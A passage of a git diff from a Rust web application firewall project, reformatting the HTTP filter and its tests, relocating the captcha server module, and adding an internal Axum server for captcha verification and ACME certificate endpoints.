let entry = headers_map.get_or_insert(key, TypedArray::new()); - match value.to_str() { - Ok(s) => entry.push(s.as_bytes()), - Err(_) => entry.push(value.as_bytes()), - } + ctx.set_field_value(self.scheme.get_field("http.request.headers").unwrap(), { + let mut headers_map: TypedMap<'_, TypedArray<'_, &[u8]>> = TypedMap::new(); + for (name, value) in req_parts.headers.iter() { + let key = name + .as_str() + .to_ascii_lowercase() + .into_bytes() + .into_boxed_slice(); + let entry = headers_map.get_or_insert(key, TypedArray::new()); + match value.to_str() { + Ok(s) => entry.push(s.as_bytes()), + Err(_) => entry.push(value.as_bytes()), } - headers_map - }, - )?; + } + headers_map + })?; ctx.set_field_value( - self.scheme.get_field("http.request.content_length").unwrap(), + self.scheme + .get_field("http.request.content_length") + .unwrap(), content_length, )?; ctx.set_field_value( @@ -495,19 +585,16 @@ impl HttpFilter { self.scheme.get_field("http.request.body_sha256").unwrap(), body_sha256_hex, )?; - ctx.set_field_value( - self.scheme.get_field("ip.src").unwrap(), - peer_addr.ip(), - )?; + ctx.set_field_value(self.scheme.get_field("ip.src").unwrap(), peer_addr.ip())?; // Fetch threat intelligence data for the source IP // Fetch full threat response for access logging, and WAF fields for rule evaluation - log::info!("🔍 [WAF] Looking up GeoIP for: {}", peer_addr.ip()); - let threat_response = threat::get_threat_intel(&peer_addr.ip().to_string()).await.ok().flatten(); + let threat_response = threat::get_threat_intel(&peer_addr.ip().to_string()) + .await + .ok() + .flatten(); let _threat_fields = if let Some(ref threat_resp) = threat_response { let waf_fields = threat::WafFields::from(threat_resp); - log::info!("🔍 [WAF] GeoIP Result: Country='{}', ASN={}, ThreatScore={}", - waf_fields.ip_src_country, waf_fields.ip_src_asn, waf_fields.threat_score); // Set threat intelligence fields ctx.set_field_value( self.scheme.get_field("ip.src.country").unwrap(), @@ -536,31 +623,12 @@ impl HttpFilter { Some(waf_fields) } else { // No threat data found, set default values - log::warn!("🔍 [WAF] No GeoIP data found for {}, setting empty country", peer_addr.ip()); - ctx.set_field_value( - self.scheme.get_field("ip.src.country").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("ip.src.asn").unwrap(), - 0i64, - )?; - ctx.set_field_value( - self.scheme.get_field("ip.src.asn_org").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("ip.src.asn_country").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("threat.score").unwrap(), - 0i64, - )?; - ctx.set_field_value( - self.scheme.get_field("threat.advice").unwrap(), - "", - )?; + ctx.set_field_value(self.scheme.get_field("ip.src.country").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("ip.src.asn").unwrap(), 0i64)?; + ctx.set_field_value(self.scheme.get_field("ip.src.asn_org").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("ip.src.asn_country").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("threat.score").unwrap(), 0i64)?; + ctx.set_field_value(self.scheme.get_field("threat.advice").unwrap(), "")?; None }; @@ -568,7 +636,7 @@ impl HttpFilter { let http_version = format!("{:?}", req_parts.version); // Generate JA4H fingerprint from HTTP request (available now) - let ja4h_fp = crate::ja4_plus::Ja4hFingerprint::from_http_request( + let ja4h_fp = crate::utils::fingerprint::ja4_plus::Ja4hFingerprint::from_http_request( method, &http_version, &req_parts.headers, @@ -576,38 +644,17 @@ impl HttpFilter { // Set default empty values for all signal (JA4) fields // These fields will be populated when JA4 data is available - ctx.set_field_value( - self.scheme.get_field("signal.ja4").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4_raw").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4_unsorted").unwrap(), - "", - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4_raw").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4_unsorted").unwrap(), "")?; ctx.set_field_value( self.scheme.get_field("signal.ja4_raw_unsorted").unwrap(), "", )?; - ctx.set_field_value( - self.scheme.get_field("signal.tls_version").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.cipher_suite").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.sni").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.alpn").unwrap(), - "", - )?; + ctx.set_field_value(self.scheme.get_field("signal.tls_version").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.cipher_suite").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.sni").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.alpn").unwrap(), "")?; // Populate JA4H fields from generated fingerprint ctx.set_field_value( self.scheme.get_field("signal.ja4h").unwrap(), @@ -637,46 +684,25 @@ impl HttpFilter { self.scheme.get_field("signal.ja4h_language").unwrap(), ja4h_fp.language.clone(), )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4t").unwrap(), - "", - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4t").unwrap(), "")?; ctx.set_field_value( self.scheme.get_field("signal.ja4t_window_size").unwrap(), 0i64, )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4t_ttl").unwrap(), - 0i64, - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4t_mss").unwrap(), - 0i64, - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4t_ttl").unwrap(), 0i64)?; + ctx.set_field_value(self.scheme.get_field("signal.ja4t_mss").unwrap(), 0i64)?; ctx.set_field_value( self.scheme.get_field("signal.ja4t_window_scale").unwrap(), 0i64, )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4l_client").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4l_server").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4l_syn_time").unwrap(), - 0i64, - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4l_client").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4l_server").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4l_syn_time").unwrap(), 0i64)?; ctx.set_field_value( self.scheme.get_field("signal.ja4l_synack_time").unwrap(), 0i64, )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4l_ack_time").unwrap(), - 0i64, - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4l_ack_time").unwrap(), 0i64)?; ctx.set_field_value( self.scheme.get_field("signal.ja4l_ttl_client").unwrap(), 0i64, @@ -685,30 +711,12 @@ impl HttpFilter { self.scheme.get_field("signal.ja4l_ttl_server").unwrap(), 0i64, )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4s").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4s_proto").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4s_version").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4s_cipher").unwrap(), - 0i64, - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4s_alpn").unwrap(), - "", - )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4x").unwrap(), - "", - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4s").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4s_proto").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4s_version").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4s_cipher").unwrap(), 0i64)?; + ctx.set_field_value(self.scheme.get_field("signal.ja4s_alpn").unwrap(), "")?; + ctx.set_field_value(self.scheme.get_field("signal.ja4x").unwrap(), "")?; ctx.set_field_value( self.scheme.get_field("signal.ja4x_issuer_rdns").unwrap(), "", @@ -717,10 +725,7 @@ impl HttpFilter { self.scheme.get_field("signal.ja4x_subject_rdns").unwrap(), "", )?; - ctx.set_field_value( - self.scheme.get_field("signal.ja4x_extensions").unwrap(), - "", - )?; + ctx.set_field_value(self.scheme.get_field("signal.ja4x_extensions").unwrap(), "")?; // Execute each rule individually and return the first match let rules_guard = self.rules.read().unwrap(); @@ -754,7 +759,6 @@ pub fn set_global_http_filter(filter: HttpFilter) -> anyhow::Result<()> { .map_err(|_| anyhow!("Failed to initialize HTTP filter")) } - /// Initialize the global config + HTTP filter from API with retry logic pub async fn init_config(base_url: String, api_key: String) -> anyhow::Result<()> { let mut retry_count = 0; @@ -766,18 +770,30 @@ pub async fn init_config(base_url: String, api_key: String) -> anyhow::Result<() Ok(config_response) => { let filter = HttpFilter::new_from_config(&config_response.config)?; set_global_http_filter(filter)?; - log::info!("HTTP filter initialized with {} WAF rules from config", config_response.config.waf_rules.rules.len()); + log::info!( + "HTTP filter initialized with {} WAF rules from config", + config_response.config.waf_rules.rules.len() + ); return Ok(()); } Err(e) => { let error_msg = e.to_string(); if error_msg.contains("503") && retry_count < MAX_RETRIES { retry_count += 1; - log::warn!("Failed to fetch config for HTTP filter (attempt {}): {}. Retrying in {}ms...", retry_count, error_msg, RETRY_DELAY_MS); + log::warn!( + "Failed to fetch config for HTTP filter (attempt {}): {}. Retrying in {}ms...", + retry_count, + error_msg, + RETRY_DELAY_MS + ); tokio::time::sleep(tokio::time::Duration::from_millis(RETRY_DELAY_MS)).await; continue; } else { - log::error!("Failed to fetch config for HTTP filter after {} attempts: {}", retry_count + 1, error_msg); + log::error!( + "Failed to fetch config for HTTP filter after {} attempts: {}", + retry_count + 1, + error_msg + ); return Err(anyhow!("Failed to initialize HTTP filter: {}", error_msg)); } } @@ -805,11 +821,20 @@ pub async fn update_with_config(base_url: String, api_key: String) -> anyhow::Re let error_msg = e.to_string(); if error_msg.contains("503") && retry_count < MAX_RETRIES { retry_count += 1; - log::warn!("Failed to fetch config for HTTP filter update (attempt {}): {}. Retrying in {}ms...", retry_count, error_msg, RETRY_DELAY_MS); + log::warn!( + "Failed to fetch config for HTTP filter update (attempt {}): {}. Retrying in {}ms...", + retry_count, + error_msg, + RETRY_DELAY_MS + ); tokio::time::sleep(tokio::time::Duration::from_millis(RETRY_DELAY_MS)).await; continue; } else { - log::error!("Failed to fetch config for HTTP filter update after {} attempts: {}", retry_count + 1, error_msg); + log::error!( + "Failed to fetch config for HTTP filter update after {} attempts: {}", + retry_count + 1, + error_msg + ); return Err(anyhow!("Failed to fetch config: {}", error_msg)); } } @@ -848,7 +873,8 @@ pub async fn load_waf_rules(waf_rules: Vec) -> a }, }, waf_rules: crate::worker::config::WafRules { rules: waf_rules }, - content_scanning: crate::content_scanning::ContentScanningConfig::default(), + content_scanning: + crate::security::waf::actions::content_scanning::ContentScanningConfig::default(), created_at: chrono::Utc::now().to_rfc3339(), updated_at: chrono::Utc::now().to_rfc3339(), last_modified: chrono::Utc::now().to_rfc3339(), @@ -891,7 +917,14 @@ pub async fn evaluate_waf_for_pingora_request( } else { // Construct absolute URI from relative path // Use http://localhost as base since we only need the path/query for WAF evaluation - format!("http://localhost{}", req_header.uri.path_and_query().map(|pq| pq.as_str()).unwrap_or("/")) + format!( + "http://localhost{}", + req_header + .uri + .path_and_query() + .map(|pq| pq.as_str()) + .unwrap_or("/") + ) }; let uri = match uri_str.parse::() { @@ -928,10 +961,17 @@ pub async fn evaluate_waf_for_pingora_request( }; let (req_parts, _) = req.into_parts(); - log::debug!("WAF: Evaluating request - method={}, uri={}, peer={}", - req_header.method.as_str(), uri_str, peer_addr); - - match filter.should_block_request_from_parts(&req_parts, body_bytes, peer_addr).await { + log::debug!( + "WAF: Evaluating request - method={}, uri={}, peer={}", + req_header.method.as_str(), + uri_str, + peer_addr + ); + + match filter + .should_block_request_from_parts(&req_parts, body_bytes, peer_addr) + .await + { Ok(result) => { if result.is_some() { log::debug!("WAF: Rule matched - {:?}", result); @@ -951,7 +991,6 @@ mod tests { use hyper::http::request::Builder; use std::net::Ipv4Addr; - #[tokio::test] async fn test_custom_filter() -> Result<()> { // Test a custom filter that blocks requests to specific host @@ -964,9 +1003,15 @@ mod tests { let (req_parts, _) = req.into_parts(); let peer_addr = SocketAddr::new(Ipv4Addr::new(127, 0, 0, 1).into(), 8080); - let result = filter.should_block_request_from_parts(&req_parts, b"", peer_addr).await?; + let result = filter + .should_block_request_from_parts(&req_parts, b"", peer_addr) + .await?; if let Some(waf_result) = result { - assert_eq!(waf_result.action, WafAction::Block, "Request to blocked host should be blocked"); + assert_eq!( + waf_result.action, + WafAction::Block, + "Request to blocked host should be blocked" + ); } else { panic!("Request to blocked host should be blocked"); } @@ -990,11 +1035,16 @@ mod tests { // Test with clean content (should not be blocked by content scanning) let clean_content = b"Clean content"; - let result = filter.should_block_request_from_parts(&req_parts, clean_content, peer_addr).await?; + let result = filter + .should_block_request_from_parts(&req_parts, clean_content, peer_addr) + .await?; // Should be blocked by host rule, not content scanning if let Some(waf_result) = result { - assert_eq!(waf_result.rule_name, "default", "Request to example.com should be blocked by host rule"); + assert_eq!( + waf_result.rule_name, "default", + "Request to example.com should be blocked by host rule" + ); } else { panic!("Request to example.com should be blocked by host rule"); } @@ -1015,9 +1065,15 @@ mod tests { .version(hyper::http::Version::HTTP_10) .body(())?; let (req_parts_http10, _) = req_http10.into_parts(); - let result_http10 = filter_http10.should_block_request_from_parts(&req_parts_http10, b"", peer_addr).await?; + let result_http10 = filter_http10 + .should_block_request_from_parts(&req_parts_http10, b"", peer_addr) + .await?; if let Some(waf_result) = result_http10 { - assert_eq!(waf_result.action, WafAction::Block, "HTTP/1.0 request should match version check"); + assert_eq!( + waf_result.action, + WafAction::Block, + "HTTP/1.0 request should match version check" + ); } else { panic!("HTTP/1.0 request should match version check"); } @@ -1030,9 +1086,15 @@ mod tests { .version(hyper::http::Version::HTTP_11) .body(())?; let (req_parts_http11, _) = req_http11.into_parts(); - let result_http11 = filter_http11.should_block_request_from_parts(&req_parts_http11, b"", peer_addr).await?; + let result_http11 = filter_http11 + .should_block_request_from_parts(&req_parts_http11, b"", peer_addr) + .await?; if let Some(waf_result) = result_http11 { - assert_eq!(waf_result.action, WafAction::Block, "HTTP/1.1 request should match version check"); + assert_eq!( + waf_result.action, + WafAction::Block, + "HTTP/1.1 request should match version check" + ); } else { panic!("HTTP/1.1 request should match version check"); } @@ -1045,9 +1107,15 @@ mod tests { .version(hyper::http::Version::HTTP_2) .body(())?; let (req_parts_http2, _) = req_http2.into_parts(); - let result_http2 = filter_http2.should_block_request_from_parts(&req_parts_http2, b"", peer_addr).await?; + let result_http2 = filter_http2 + .should_block_request_from_parts(&req_parts_http2, b"", peer_addr) + .await?; if let Some(waf_result) = result_http2 { - assert_eq!(waf_result.action, WafAction::Block, "HTTP/2.0 request should match version check"); + assert_eq!( + waf_result.action, + WafAction::Block, + "HTTP/2.0 request should match version check" + ); } else { panic!("HTTP/2.0 request should match version check"); } @@ -1060,8 +1128,13 @@ mod tests { .version(hyper::http::Version::HTTP_11) .body(())?; let (req_parts_wrong, _) = req_wrong.into_parts(); - let result_wrong = filter_wrong_version.should_block_request_from_parts(&req_parts_wrong, b"", peer_addr).await?; - assert!(result_wrong.is_none(), "HTTP/1.1 request should not match HTTP/1.0 version check"); + let result_wrong = filter_wrong_version + .should_block_request_from_parts(&req_parts_wrong, b"", peer_addr) + .await?; + assert!( + result_wrong.is_none(), + "HTTP/1.1 request should not match HTTP/1.0 version check" + ); Ok(()) } @@ -1079,8 +1152,13 @@ mod tests { .version(hyper::http::Version::HTTP_10) .body(())?; let (req_parts_http10, _) = req_http10.into_parts(); - let result_http10 = filter_http10.should_block_request_from_parts(&req_parts_http10, b"", peer_addr).await?; - assert!(result_http10.is_some(), "HTTP/1.0 request should generate JA4H starting with 'ge10'"); + let result_http10 = filter_http10 + .should_block_request_from_parts(&req_parts_http10, b"", peer_addr) + .await?; + assert!( + result_http10.is_some(), + "HTTP/1.0 request should generate JA4H starting with 'ge10'" + ); // Test that JA4H fingerprint starts with correct version code for HTTP/1.1 (should be "11") let filter_http11 = HttpFilter::new("starts_with(signal.ja4h, \"ge11\")")?; @@ -1090,8 +1168,13 @@ mod tests { .version(hyper::http::Version::HTTP_11) .body(())?; let (req_parts_http11, _) = req_http11.into_parts(); - let result_http11 = filter_http11.should_block_request_from_parts(&req_parts_http11, b"", peer_addr).await?; - assert!(result_http11.is_some(), "HTTP/1.1 request should generate JA4H starting with 'ge11'"); + let result_http11 = filter_http11 + .should_block_request_from_parts(&req_parts_http11, b"", peer_addr) + .await?; + assert!( + result_http11.is_some(), + "HTTP/1.1 request should generate JA4H starting with 'ge11'" + ); // Test that JA4H fingerprint starts with correct version code for HTTP/2.0 (should be "20") let filter_http2 = HttpFilter::new("starts_with(signal.ja4h, \"ge20\")")?; @@ -1101,8 +1184,13 @@ mod tests { .version(hyper::http::Version::HTTP_2) .body(())?; let (req_parts_http2, _) = req_http2.into_parts(); - let result_http2 = filter_http2.should_block_request_from_parts(&req_parts_http2, b"", peer_addr).await?; - assert!(result_http2.is_some(), "HTTP/2.0 request should generate JA4H starting with 'ge20'"); + let result_http2 = filter_http2 + .should_block_request_from_parts(&req_parts_http2, b"", peer_addr) + .await?; + assert!( + result_http2.is_some(), + "HTTP/2.0 request should generate JA4H starting with 'ge20'" + ); Ok(()) } diff --git a/src/captcha_server.rs b/src/server/captcha_server.rs similarity index 84% rename from src/captcha_server.rs rename to src/server/captcha_server.rs index f376955..8bae668 100644 --- a/src/captcha_server.rs +++ b/src/server/captcha_server.rs @@ -1,10 +1,10 @@ use axum::{ + Router, body::{Body, Bytes}, extract::{ConnectInfo, State}, http::StatusCode, response::{IntoResponse, Response}, routing::{get, post}, - Router, }; use log::{error, info, warn}; use std::collections::HashMap; @@ -41,9 +41,15 @@ async fn handle_captcha_verification( State(()): State<()>, body: Bytes, ) -> Response { - use crate::waf::actions::captcha::{validate_and_mark_captcha, apply_captcha_challenge}; + use crate::security::waf::actions::captcha::{ + apply_captcha_challenge, validate_and_mark_captcha, + }; - info!("Starting captcha verification handler from: {} with body size: {}", peer_addr, body.len()); + info!( + "Starting captcha verification handler from: {} with body size: {}", + peer_addr, + body.len() + ); // Parse form data from request body let form_data: HashMap = match String::from_utf8(body.to_vec()) { @@ -54,7 +60,10 @@ async fn handle_captcha_verification( .collect() } Err(e) => { - error!("Failed to parse captcha verification request body as UTF-8: {}", e); + error!( + "Failed to parse captcha verification request body as UTF-8: {}", + e + ); return (StatusCode::BAD_REQUEST, "Invalid request body").into_response(); } }; @@ -65,7 +74,10 @@ async fn handle_captcha_verification( let captcha_response = match form_data.get("captcha_response") { Some(response) => response.clone(), None => { - warn!("Missing captcha_response in verification request from {}", peer_addr.ip()); + warn!( + "Missing captcha_response in verification request from {}", + peer_addr.ip() + ); return (StatusCode::BAD_REQUEST, "Missing captcha_response").into_response(); } }; @@ -73,7 +85,10 @@ async fn handle_captcha_verification( let jwt_token = match form_data.get("jwt_token") { Some(token) => token.clone(), None => { - warn!("Missing jwt_token in verification request from {}", peer_addr.ip()); + warn!( + "Missing jwt_token in verification request from {}", + peer_addr.ip() + ); return (StatusCode::BAD_REQUEST, "Missing jwt_token").into_response(); } }; @@ -132,7 +147,7 @@ async fn handle_captcha_verification( "# - .to_string() + .to_string() }); Response::builder() @@ -145,9 +160,12 @@ async fn handle_captcha_verification( .unwrap() } Err(e) => { - error!("Captcha verification error for IP {}: {}", peer_addr.ip(), e); + error!( + "Captcha verification error for IP {}: {}", + peer_addr.ip(), + e + ); (StatusCode::INTERNAL_SERVER_ERROR, "Verification error").into_response() } } } - diff --git a/src/server/internal_server.rs b/src/server/internal_server.rs new file mode 100644 index 0000000..de5786f --- /dev/null +++ b/src/server/internal_server.rs @@ -0,0 +1,568 @@ +//! Internal services server - unified HTTP server for captcha verification and ACME endpoints +//! Uses Axum framework to serve both services on a single port + +use axum::{ + Router, + body::Bytes, + extract::{ConnectInfo, Path, State}, + http::StatusCode, + response::{IntoResponse, Json, Response}, + routing::{get, post}, +}; +use log::{error, info, warn}; +use serde::Serialize; +use std::collections::HashMap; +use std::net::SocketAddr; +use std::path::PathBuf; +use std::sync::Arc; +use tokio::net::TcpListener; +use tokio::sync::RwLock; +use tower_http::services::ServeDir; + +use crate::proxy::acme::DomainReader; +use crate::proxy::acme::embedded::EmbeddedAcmeConfig; + +/// Configuration for the internal services server +#[derive(Clone)] +pub struct InternalServerConfig { + /// Port to bind the server to + pub port: u16, + /// Bind IP address (default: 127.0.0.1) + pub bind_ip: String, + /// ACME challenge directory for serving challenge files + pub acme_challenge_dir: Option, + /// ACME configuration + pub acme_config: Option>, + /// ACME domain reader + pub acme_domain_reader: Option>>>>, +} + +impl Default for InternalServerConfig { + fn default() -> Self { + Self { + port: 9180, + bind_ip: "127.0.0.1".to_string(), + acme_challenge_dir: None, + acme_config: None, + acme_domain_reader: None, + } + } +} + +/// Shared state for the internal server +#[derive(Clone)] +struct ServerState { + acme_config: Option>, + acme_domain_reader: Option>>>>, +} + +/// Start the unified internal services server +pub async fn start_internal_server(config: InternalServerConfig) -> anyhow::Result<()> { + let address = format!("{}:{}", config.bind_ip, config.port); + info!("Starting internal services server on: {}", address); + + let state = ServerState { + acme_config: config.acme_config.clone(), + acme_domain_reader: config.acme_domain_reader.clone(), + }; + + // Build the router with all endpoints + let mut app = Router::new() + .route("/health", get(health_check)) + .route("/cgi-bin/captcha/verify", post(handle_captcha_verification)) + .route("/cert/expiration", get(check_all_certs_expiration)) + .route("/cert/expiration/:domain", get(check_cert_expiration)) + .route("/cert/renew/:domain", post(renew_cert)) + .with_state(state); + + // Add ACME challenge file serving if directory is configured + if let Some(challenge_dir) = config.acme_challenge_dir { + info!("Serving ACME challenges from: {:?}", challenge_dir); + app = app.nest_service("/.well-known/acme-challenge", ServeDir::new(challenge_dir)); + } + + let listener = TcpListener::bind(&address).await?; + info!("Internal services server listening on: {}", address); + + axum::serve( + listener, + app.into_make_service_with_connect_info::(), + ) + .await?; + + Ok(()) +} + +// ============================================================================ +// Health Check Endpoint +// ============================================================================ + +/// Health check endpoint +async fn health_check() -> &'static str { + "OK" +} + +// ============================================================================ +// Captcha Verification Endpoint +// ============================================================================ + +/// Handle captcha verification requests +async fn handle_captcha_verification( + ConnectInfo(peer_addr): ConnectInfo, + body: Bytes, +) -> Response { + use crate::security::waf::actions::captcha::{ + apply_captcha_challenge, validate_and_mark_captcha, + }; + + info!( + "Starting captcha verification handler from: {} with body size: {}", + peer_addr, + body.len() + ); + + // Parse form data from request body + let form_data: HashMap = match String::from_utf8(body.to_vec()) { + Ok(body_str) => url_decode_form_data(&body_str).into_iter().collect(), + Err(e) => { + error!("Failed to parse request body as UTF-8: {}", e); + return ( + StatusCode::BAD_REQUEST, + "Invalid request body encoding".to_string(), + ) + .into_response(); + } + }; + + // Extract required fields + let captcha_response = match form_data.get("captcha_response") { + Some(response) => response.clone(), + None => { + warn!( + "Missing captcha_response in verification request from {}", + peer_addr.ip() + ); + return ( + StatusCode::BAD_REQUEST, + "Missing captcha_response".to_string(), + ) + .into_response(); + } + }; + + let jwt_token = match form_data.get("jwt_token") { + Some(token) => token.clone(), + None => { + warn!( + "Missing jwt_token in verification request from {}", + peer_addr.ip() + ); + return (StatusCode::BAD_REQUEST, "Missing jwt_token".to_string()).into_response(); + } + }; + + // Get user agent from request (would need to be passed in a real implementation) + let user_agent = String::from("Mozilla/5.0"); // Placeholder + + // Validate captcha and mark token as validated + match validate_and_mark_captcha( + captcha_response, + jwt_token.clone(), + peer_addr.ip().to_string(), + Some(user_agent), + ) + .await + { + Ok(true) => { + info!("Captcha validation successful for IP: {}", peer_addr.ip()); + + // Return 302 redirect with Set-Cookie header + Response::builder() + .status(StatusCode::FOUND) + .header("Location", "/") + .header( + "Set-Cookie", + format!( + "captcha_token={}; Path=/; Max-Age=3600; HttpOnly; SameSite=Lax", + jwt_token + ), + ) + .header("Cache-Control", "no-cache, no-store, must-revalidate") + .header("Pragma", "no-cache") + .header("Expires", "0") + .body(axum::body::Body::empty()) + .unwrap() + } + Ok(false) => { + warn!("Captcha verification failed for IP: {}", peer_addr.ip()); + + // Generate failure page with retry option + let failure_html = apply_captcha_challenge().unwrap_or_else(|_| { + r#" + + + Verification Failed + + + +

Verification Failed

+
+

Captcha verification failed. Please try again.

+

Return to main page

+
+ +"# + .to_string() + }); + + Response::builder() + .status(StatusCode::FORBIDDEN) + .header("Content-Type", "text/html; charset=utf-8") + .header("Cache-Control", "no-cache, no-store, must-revalidate") + .header("Pragma", "no-cache") + .header("Expires", "0") + .body(axum::body::Body::from(failure_html)) + .unwrap() + } + Err(e) => { + error!( + "Captcha verification error for IP {}: {}", + peer_addr.ip(), + e + ); + ( + StatusCode::INTERNAL_SERVER_ERROR, + "Verification error".to_string(), + ) + .into_response() + } + } +} + +/// Simple URL-encoded form data parser +fn url_decode_form_data(data: &str) -> Vec<(String, String)> { + data.split('&') + .filter_map(|pair| { + let mut parts = pair.splitn(2, '='); + let key = parts.next()?.to_string(); + let value = parts.next().unwrap_or("").to_string(); + Some(( + urlencoding::decode(&key).ok()?.into_owned(), + urlencoding::decode(&value).ok()?.into_owned(), + )) + }) + .collect() +} + +// ============================================================================ +// ACME Certificate Management Endpoints +// ============================================================================ + +#[derive(Serialize)] +struct ApiError { + error: String, +} + +/// Check expiration for all certificates +async fn check_all_certs_expiration( + State(state): State, +) -> Result>, (StatusCode, Json)> { + let acme_config = state.acme_config.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "ACME not configured".to_string(), + }), + ) + })?; + + let reader_lock = state.acme_domain_reader.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "Domain reader not initialized".to_string(), + }), + ) + })?; + + let reader = reader_lock.read().await; + let reader_ref = reader.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "Domain reader not initialized".to_string(), + }), + ) + })?; + + let domains = reader_ref.read_domains().await.map_err(|e| { + warn!("Error reading domains: {}", e); + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to read domains: {}", e), + }), + ) + })?; + + let mut results = Vec::new(); + for domain_config in domains { + let domain_cfg = match create_domain_config_for_handler(acme_config, &domain_config) { + Ok(cfg) => cfg, + Err(e) => { + warn!( + "Error creating domain config for {}: {}", + domain_config.domain, e + ); + continue; + } + }; + + let storage = match crate::proxy::acme::StorageFactory::create_default(&domain_cfg) { + Ok(s) => s, + Err(e) => { + warn!("Error creating storage for {}: {}", domain_config.domain, e); + continue; + } + }; + + let exists = storage.cert_exists().await; + results.push(serde_json::json!({ + "domain": domain_config.domain, + "exists": exists, + })); + } + + Ok(Json(results)) +} + +/// Check expiration for a specific certificate +async fn check_cert_expiration( + State(state): State, + Path(domain): Path, +) -> Result, (StatusCode, Json)> { + let acme_config = state.acme_config.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "ACME not configured".to_string(), + }), + ) + })?; + + let reader_lock = state.acme_domain_reader.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "Domain reader not initialized".to_string(), + }), + ) + })?; + + let reader = reader_lock.read().await; + let reader_ref = reader.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "Domain reader not initialized".to_string(), + }), + ) + })?; + + let domains = reader_ref.read_domains().await.map_err(|e| { + warn!("Error reading domains: {}", e); + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to read domains: {}", e), + }), + ) + })?; + + let domain_config = domains + .iter() + .find(|d| d.domain == domain) + .cloned() + .ok_or_else(|| { + ( + StatusCode::NOT_FOUND, + Json(ApiError { + error: format!("Domain '{}' not found in upstreams config", domain), + }), + ) + })?; + + let domain_cfg = + create_domain_config_for_handler(acme_config, &domain_config).map_err(|e| { + warn!("Error creating domain config for {}: {}", domain, e); + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to create domain config: {}", e), + }), + ) + })?; + + let storage = crate::proxy::acme::StorageFactory::create_default(&domain_cfg).map_err(|e| { + warn!("Error creating storage for {}: {}", domain, e); + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to create storage: {}", e), + }), + ) + })?; + + let exists = storage.cert_exists().await; + Ok(Json(serde_json::json!({ + "domain": domain, + "exists": exists, + }))) +} + +/// Renew a specific certificate +async fn renew_cert( + State(state): State, + Path(domain): Path, +) -> Result, (StatusCode, Json)> { + let acme_config = state.acme_config.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "ACME not configured".to_string(), + }), + ) + })?; + + let reader_lock = state.acme_domain_reader.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "Domain reader not initialized".to_string(), + }), + ) + })?; + + let reader = reader_lock.read().await; + let reader_ref = reader.as_ref().ok_or_else(|| { + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: "Domain reader not initialized".to_string(), + }), + ) + })?; + + let domains = reader_ref.read_domains().await.map_err(|e| { + warn!("Error reading domains: {}", e); + ( + StatusCode::INTERNAL_SERVER_ERROR, + Json(ApiError { + error: format!("Failed to read domains: {}", e), + }), + ) + })?; + + let domain_config = domains + .iter() + .find(|d| d.domain == domain) + .cloned() + .ok_or_else(|| { + ( + StatusCode::NOT_FOUND, + Json(ApiError { + error: format!("Domain '{}' not found in upstreams config", domain), + }), + ) + })?; + + let domain_cfg = + create_domain_config_for_handler(acme_config, 